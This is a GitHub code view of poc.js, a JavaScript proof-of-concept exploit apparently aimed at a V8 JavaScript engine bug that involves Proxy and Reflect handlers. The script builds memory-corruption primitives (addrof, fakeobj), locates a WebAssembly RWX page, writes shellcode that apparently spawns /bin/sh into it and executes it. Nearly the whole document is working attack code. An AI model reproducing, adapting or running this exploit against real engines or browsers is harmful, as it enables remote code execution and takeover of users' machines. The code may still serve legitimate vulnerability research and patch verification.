-
Notifications
You must be signed in to change notification settings - Fork 8
/
Copy pathpoc.js
121 lines (96 loc) · 2.95 KB
/
poc.js
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
callFn = function(code) {
try {
code();
} catch (e) {
console.log(e);
}
}
let proxy = new Proxy({}, {});
function run(prop, ...args) {
let handler = {};
const proxy = new Proxy(function() {}, handler);
handler[prop] = (({
v1 = ((v2 = (function() {
var v3 = 0;
var callFn = 0;
if (asdf) {
return;
} else {
return;
}
(function() {
v3();
});
(function() {
callFn = "\u0041".repeat(1024 * 32); // mutate "run"
v3 = [1.1, 2.2, 3.3]; // now "proxy" becomes a packed array.
v4 = [{}].slice();
v5 = [4.4];
})
})) => (1))()
}, ...args) => (1));
Reflect[prop](proxy, ...args);
}
callFn((() => (run("construct", []))));
callFn((() => (run("prop1"))));
function test() {
let convert = new ArrayBuffer(0x8);
let f64 = new Float64Array(convert);
let u32 = new Uint32Array(convert);
function d2u(v) {
f64[0] = v;
return u32;
}
function u2d(lo, hi) {
u32[0] = lo;
u32[1] = hi;
return f64[0];
}
function hex(d) {
let val = d2u(d);
return ("0x" + (val[1] * 0x100000000 + val[0]).toString(16));
}
let shellcode = [0x6a6848b8, 0x2f62696e, 0x2f2f2f73, 0x504889e7, 0x68726901, 0x1813424, 0x1010101, 0x31f656be, 0x1010101, 0x81f60901, 0x1014801, 0xe6564889, 0xe631d2b8, 0x01010101, 0x353a0101, 0x01900f05];
let wasm_code = new Uint8Array([0, 97, 115, 109, 1, 0, 0, 0, 1, 7, 1, 96, 2, 127, 127, 1, 127, 3, 2, 1, 0, 4, 4, 1, 112, 0, 0, 5, 3, 1, 0, 1, 7, 21, 2, 6, 109, 101, 109, 111, 114, 121, 2, 0, 8, 95, 90, 51, 97, 100, 100, 105, 105, 0, 0, 10, 9, 1, 7, 0, 32, 1, 32, 0, 106, 11]);
let wasm_mod = new WebAssembly.Instance(new WebAssembly.Module(wasm_code), {});
let f = wasm_mod.exports._Z3addii;
run[18] = 0x41414141;
if(proxy.length == 0x41414141){
print("exploit success!\n");
}
else{
print("exploit fail TT\n");
}
let addrof = function(obj) {
v4[0] = obj;
var leak = proxy[26];
return leak;
}
let fakeobj = function(addr) {
proxy[26] = addr;
var obj = v4[0];
return obj;
}
let ab = new ArrayBuffer(0x100);
let abAddr = addrof(ab);
print("array buffer : " + hex(abAddr));
let wasmObj = addrof(f) - u2d(0x108, 0);
doubleMap = proxy[34];
var fake = [
doubleMap, 0,
wasmObj, u2d(0, 0x8)
].slice();
var fakeAddr = addrof(fake) - u2d(0x20, 0);
print("fake_addr : " + hex(fakeAddr));
var target = fakeobj(fakeAddr);
let rwx = target[0];
print("rwx : " + hex(rwx));
fake[2] = abAddr + u2d(0x10, 0);
target[0] = rwx;
let dv = new DataView(ab);
for (var i = 0; i < shellcode.length; i++) {
dv.setUint32(i * 4, shellcode[i]);
}
f();
}
test();